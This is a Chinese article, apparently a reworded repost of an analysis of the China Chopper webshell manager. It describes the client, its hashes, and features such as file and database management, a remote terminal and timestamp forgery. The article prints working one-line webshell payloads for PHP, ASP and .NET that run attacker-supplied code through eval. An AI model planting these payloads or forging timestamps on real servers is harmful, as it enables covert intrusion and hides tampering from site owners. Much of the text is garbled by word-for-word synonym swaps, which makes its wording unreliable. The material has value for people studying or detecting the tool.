十大黑客工具之中国菜刀（Chopper）

Chopper是中国黑客圈内行使很是普及的一款Webshell打点器材。中国菜刀用途异常普及，支持多种说话，小巧适用。

Web Shell客户端

中国菜刀的客户端可在www.maicaidao.com下载到。

Web shell (CnC) Client MD5 
caidao.exe 5001ef50c7e869253a7c152a638eab8a 

注：这里可以对你的下载菜单的MD5值是否沟通，假如差异则有也许加了后门可能绑缚了木马。

客户端行使UPX加壳，有220672个字节巨细，如图1所示：

行使脱壳器材脱壳，可以看到一些潜匿的细节：

C:Documents and SettingsAdministratorDesktop>upx -d 5001ef50c7e869253a7c152a638eab8a.exe -o decomp.exeUltimate Packer for eXecutablesCopyright (C) 1996 - 2011 
UPX 3.08w Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011 
File size Ratio Format Name 
-------------------- ------ ----------- ----------- 
700416 <- 220672 31.51% win32/pe decomp.exe 
Unpacked 1 file. 

行使PEID(一个免费检测软件行使的加壳伎俩的器材)，我们可以看到解压缩后的客户端措施行使Visual C + + 6.0编写，如图2所示：

由于字符串没有举办编码，以是可以通过打印输出该后门怎样通讯，我们可以看到一个url google.com.hk(图3)，以嘉拷寮文本Chopper(图4）。

打开中国菜刀界面，我们可以看到该器材是一款图形界面器材，而且提供了添加本身的方针、打点的成果，在客户端软件上，右键单击选择“添加”，输入IP地点，以及暗码和编码方法，如图5所示：

处事端payload组件

中国菜刀的器材是一款Webshell打点器材，响应肯定有一个处事端的措施，它支持各类说话，如ASP、ASPX、PHP、JSP、CFM，一些官网下载原始措施MD5 HASH如下：

Web shell Payload MD5 Hash 
Customize.aspx 8aa603ee2454da64f4c70f24cc0b5e08 
Customize.cfm ad8288227240477a95fb023551773c84 
Customize.jsp acba8115d027529763ea5c7ed6621499 

例子如下：

PHP: <?php @eval($_POST['pass']);?> 
ASP: <%eval request("pass")%> 
.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 

在现实行使进程中，替代PASS为链接的时辰必要的暗码。

成果

上面简朴先容了中国菜刀的客户端和处事端的，下面来先容下该款器材的其他成果，中国菜刀包括了“安详扫描”成果，进攻者可以或许行使爬虫或暴力破解来进攻方针站点，如下图：

在除了发明裂痕之外，中国菜刀最强盛的莫过于打点成果了，包括以下内容：

• 文件打点(文件资源打点器)
• 数据库打点(DB客户端)
• 假造终端(呼吁行)

在中国菜刀的客户端界面中，右键单击一个方针可以查察响应的成果列表，如图7：

文件打点

中国菜刀作为一个长途会见器材(RAT)，包括了常见的上传、下载、编辑、删除、复制、重定名以及改变文件的时刻戳。如图8：

修改文件成果此刻常见的webshell就带了该成果，图9表现了测试目次的三个文件，由于Windows资源打点器只表现“修他日期”字段，以是凡是环境下，可以或许到达潜匿操纵的目标。

行使器材将文件修改和其他两个文件沟通，如图10，可以看到文件的修改的日期和其他两个文件同等，假如不是专业的人士，一样平常不会看出这几个文件的区别：

（编辑：河北网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!